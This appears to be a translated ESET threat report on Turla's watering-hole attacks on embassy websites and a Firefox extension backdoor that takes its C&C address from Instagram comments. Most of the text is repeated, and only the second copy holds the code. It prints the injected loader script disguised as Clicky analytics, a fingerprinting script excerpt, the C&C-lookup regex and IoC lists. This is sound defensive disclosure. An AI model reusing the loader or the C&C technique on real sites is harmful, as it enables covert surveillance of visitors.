Turla's cybercamping: updated Firefox extension uses Instagram
Some schemes of ART attacks do not change over the years. For example, attacks watering hole in the performance of cybergroup Turla. This grouping specializes in cyber espionage, its main goals are government and diplomatic institutions. Hackers have been using the watering hole scheme to redirect potential victims to their C & C infrastructure since at least 2014, sometimes making small changes in how they work.
We at ESET have been following the Turla campaigns and have recently discovered that hackers have returned to using the method abandoned for several months.
')
Below in the section with infection indicators there is a list of sites that Turla used in the watering hole attacks in the past. What is characteristic of this grouping, there are many sites in the list related to embassies of different countries.
Redirects are done thanks to a snippet of code that hackers add to the original page. The scripts we discovered in the last few months are as follows:
It is noteworthy that hackers added a link to Clicky, a web analytics application. Probably in this way they create the appearance of legitimacy of the script for a non-expert, although the application itself is not used in the attack.
The added script calls another script at
The next stage is the delivery of JavaScript digital fingerprints to potential victims. For this, the C & C server filters visitors by IP addresses. If the visitor is in the range of target IP addresses, he will receive a digital fingerprint script, if not, a harmless script. Below is an excerpt from the script that target users receive:
The script downloads a JS library called
In addition, the script tries to install evercookie, which will track the user's activity in the browser for all sites.
For those familiar with Turla’s watering hole attacks, it’s obvious that hackers continue to use proven methods.
Probably, some people remember the Pacifier APT report describing a targeted phishing attack using a malicious Word document that was sent to agencies all over the world. Next, the backdoor was loaded into the system, and now we know that we are talking about Skipper, the backdoor of the first stage of the Turla group.
The report also describes an extension for Firefox that is downloaded by the same type of malicious document. And, it seems, we found a new version of this extension. This is a JavaScript backdoor, different in implementation from what is described in the Pacifier APT report, but with similar functionality.
The malicious HTML5 Encoding extension spread through the compromised website of a Swiss company. This is a simple backdoor, which, however, differs in an interesting way to access the C & C server.
HTML5 Encoding uses the short URL bit.ly to access the C & C server, but the URL in its code is missing. The extension gets the address from the comments on certain Instagram posts. In our example, it was a comment to the photo of Britney Spears in the official account.
www.instagram.com/p/BO8gU41A45g
The extension examines each comment on a photo and calculates an individual hash value. If the value matches the number 183, the extension will execute the regular expression to get the URL bit.ly:
In the comments to the photo there was only one with a hash sum of 183 - of February 6, while the photo was posted in early January. Taking a comment and passing it through regex, we get the following link bit.ly: bit.ly/2kdhuHX
When we study the regular expression in detail, we see that it is looking for either
When you click on the short link, we get to
For the bit.ly link, you can get conversion statistics:
In February, only 17 transitions were recorded, which roughly coincide with the publication of the commentary. A small number of transitions may indicate a test character attacks.
The extension for Firefox serves as a simple backdoor. It collects information about the system and sends this data, encrypted with AES, to the C & C server. Similar to the description of the extension described in the Pacifier APT report.
The backdoor component can run four different types of commands:
According to our estimates, the attacks are still being conducted in test mode. The next version of the extension, if it ever appears, will be significantly different from the current one. There are several APIs used by the extension that will disappear in future versions of Firefox. They can only be used as add-ons, because their place since Firefox 57 will be taken by WebExtensions. Starting from this version and above, Firefox will no longer download add-ons, which precludes the use of these APIs.
The fact of using social networks to get the address of the C & C server is quite remarkable. In addition to Turla, this approach is used by other groups, including Dukes .
Using social networks is an additional challenge to build protection. First, the traffic from social networks associated with the activities of intruders, it is difficult to distinguish from the legitimate. Secondly, the method provides hackers with greater flexibility - you can easily change the addresses of C & C servers and remove their traces.
It is interesting to see how Turla hackers are again using the old method of using digital fingerprints, as well as looking for new ways to complicate the detection of C & C servers.
You can ask additional questions to researchers or submit malware samples related to the activities of the Turla group by emailing threatintel@eset.com.
Thanks to Clement Lecigne of Google's Threat Analysis Group for research assistance.
Firefox extension hash:
Compromised sites redirecting to digital fingerprint servers (at the time of writing this report were either legitimate or led to non-operational servers):
Compromised sites used as C & C servers of the first stage in the watering hole campaign:
We at ESET have been following the Turla campaigns and have recently discovered that hackers have returned to using the method abandoned for several months.
')
The initial stages of compromise
Below in the section with infection indicators there is a list of sites that Turla used in the watering hole attacks in the past. What is characteristic of this grouping, there are many sites in the list related to embassies of different countries.
Redirects are done thanks to a snippet of code that hackers add to the original page. The scripts we discovered in the last few months are as follows:
<!-- Clicky Web Analytics (start) --> <script type="text/javascript">// <![CDATA[ var clicky_site_ids = clicky_site_ids || []; clicky_site_ids.push(100673048); (function() { var s = document.createElement('script'); var a = 'http://www.mentalhealthcheck.net/'; var b = 'update/counter.js'; s.type = 'text/javascript'; s.async = true; s.src = '//static.getclicky.com/js'; s.src = a.concat(b); ( document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(s); })(); // ]]></script> It is noteworthy that hackers added a link to Clicky, a web analytics application. Probably in this way they create the appearance of legitimacy of the script for a non-expert, although the application itself is not used in the attack.
The added script calls another script at
mentalhealthcheck.net/update/counter.js . This server is used by Turla hackers to send victims of digital fingerprint scripts that collect information about the system they are running on. The link to the Google Analytics script was used in a similar way, but lately we see Clicky more often. In the section with infection indicators you will find a list of C & C servers that we have discovered in recent months. These are originally legitimate servers that have been infected.The next stage is the delivery of JavaScript digital fingerprints to potential victims. For this, the C & C server filters visitors by IP addresses. If the visitor is in the range of target IP addresses, he will receive a digital fingerprint script, if not, a harmless script. Below is an excerpt from the script that target users receive:
function cb_custom() { loadScript("http://www.mentalhealthcheck.net/script/pde.js", cb_custom1); } function cb_custom1() { PluginDetect.getVersion('.'); myResults['Java']=PluginDetect.getVersion('Java'); myResults['Flash']=PluginDetect.getVersion('Flash'); myResults['Shockwave']=PluginDetect.getVersion('Shockwave'); myResults['AdobeReader']=PluginDetect.getVersion('AdobeReader') || PluginDetect.getVersion('PDFReader'); var ec = new evercookie(); ec.get('thread', getCookie) The script downloads a JS library called
PluginDetect , which can collect information about plugins installed in the browser. Then the collected information is sent to the C & C server.In addition, the script tries to install evercookie, which will track the user's activity in the browser for all sites.
For those familiar with Turla’s watering hole attacks, it’s obvious that hackers continue to use proven methods.
Firefox extension
Probably, some people remember the Pacifier APT report describing a targeted phishing attack using a malicious Word document that was sent to agencies all over the world. Next, the backdoor was loaded into the system, and now we know that we are talking about Skipper, the backdoor of the first stage of the Turla group.
The report also describes an extension for Firefox that is downloaded by the same type of malicious document. And, it seems, we found a new version of this extension. This is a JavaScript backdoor, different in implementation from what is described in the Pacifier APT report, but with similar functionality.
The malicious HTML5 Encoding extension spread through the compromised website of a Swiss company. This is a simple backdoor, which, however, differs in an interesting way to access the C & C server.
Instagram use
HTML5 Encoding uses the short URL bit.ly to access the C & C server, but the URL in its code is missing. The extension gets the address from the comments on certain Instagram posts. In our example, it was a comment to the photo of Britney Spears in the official account.
www.instagram.com/p/BO8gU41A45g
The extension examines each comment on a photo and calculates an individual hash value. If the value matches the number 183, the extension will execute the regular expression to get the URL bit.ly:
(?:\\u200d(?:#|@)(\\w)In the comments to the photo there was only one with a hash sum of 183 - of February 6, while the photo was posted in early January. Taking a comment and passing it through regex, we get the following link bit.ly: bit.ly/2kdhuHX
When we study the regular expression in detail, we see that it is looking for either
@|# or Unicode-character \200d - an invisible character Zero Width Joiner, a zero-width joining machine, which is usually used to separate emoji. By copying a comment or examining its source, you can see the Zero Width Joiner before each character in the address bar:smith2155<200d>#2hot ma<200d>ke lovei<200d>d to <200d>her, <200d>uupss <200d>#Hot <200d>#XWhen you click on the short link, we get to
static.travelclothes.org/dolR_1ert.php . This address was used in past attacks by the Turla group watering hole.For the bit.ly link, you can get conversion statistics:
In February, only 17 transitions were recorded, which roughly coincide with the publication of the commentary. A small number of transitions may indicate a test character attacks.
Technical analysis
The extension for Firefox serves as a simple backdoor. It collects information about the system and sends this data, encrypted with AES, to the C & C server. Similar to the description of the extension described in the Pacifier APT report.
The backdoor component can run four different types of commands:
- Execute arbitrary file
- Upload file to C & C server
- Download file from C & C server
- Read the contents of a directory - send a list of files with sizes and dates to a C & C server
According to our estimates, the attacks are still being conducted in test mode. The next version of the extension, if it ever appears, will be significantly different from the current one. There are several APIs used by the extension that will disappear in future versions of Firefox. They can only be used as add-ons, because their place since Firefox 57 will be taken by WebExtensions. Starting from this version and above, Firefox will no longer download add-ons, which precludes the use of these APIs.
Conclusion
The fact of using social networks to get the address of the C & C server is quite remarkable. In addition to Turla, this approach is used by other groups, including Dukes .
Using social networks is an additional challenge to build protection. First, the traffic from social networks associated with the activities of intruders, it is difficult to distinguish from the legitimate. Secondly, the method provides hackers with greater flexibility - you can easily change the addresses of C & C servers and remove their traces.
It is interesting to see how Turla hackers are again using the old method of using digital fingerprints, as well as looking for new ways to complicate the detection of C & C servers.
You can ask additional questions to researchers or submit malware samples related to the activities of the Turla group by emailing threatintel@eset.com.
Thanks to Clement Lecigne of Google's Threat Analysis Group for research assistance.
Infection Indicators (IoCs)
Firefox extension hash:
html5.xpi 5ba7532b4c89cc3f7ffe15b6c0e5df82a34c22ea
html5.xpi 8e6c9e4582d18dd75162bcbc63e933db344c5680Compromised sites redirecting to digital fingerprint servers (at the time of writing this report were either legitimate or led to non-operational servers):
hxxp://www.namibianembassyusa.org
hxxp://www.avsa.org
hxxp://www.zambiaembassy.org
hxxp://russianembassy.org
hxxp://au.int
hxxp://mfa.gov.kg
hxxp://mfa.uz
hxxp://www.adesyd.es
hxxp://www.bewusstkaufen.at
hxxp://www.cifga.es
hxxp://www.jse.org
hxxp://www.embassyofindonesia.org
hxxp://www.mischendorf.at
hxxp://www.vfreiheitliche.at
hxxp://www.xeneticafontao.com
hxxp://iraqiembassy.us
hxxp://sai.gov.ua
hxxp://www.mfa.gov.md
hxxp://mkk.gov.kgCompromised sites used as C & C servers of the first stage in the watering hole campaign:
hxxp://www.mentalhealthcheck.net/update/counter.js (hxxp://bitly.com/2hlv91v+)
hxxp://www.mentalhealthcheck.net/script/pde.js
hxxp://drivers.epsoncorp.com/plugin/analytics/counter.js
hxxp://rss.nbcpost.com/news/today/content.php
hxxp://static.travelclothes.org/main.js
hxxp://msgcollection.com/templates/nivoslider/loading.php
hxxp://versal.media/?atis=509
hxxp://www.ajepcoin.com/UserFiles/File/init.php (hxxp://bit.ly/2h8Lztj+)
hxxp://loveandlight.aws3.net/wp-includes/theme-compat/akismet.php
hxxp://alessandrosl.com/core/modules/mailer/mailer.phpSource: https://habr.com/ru/post/330446/
All Articles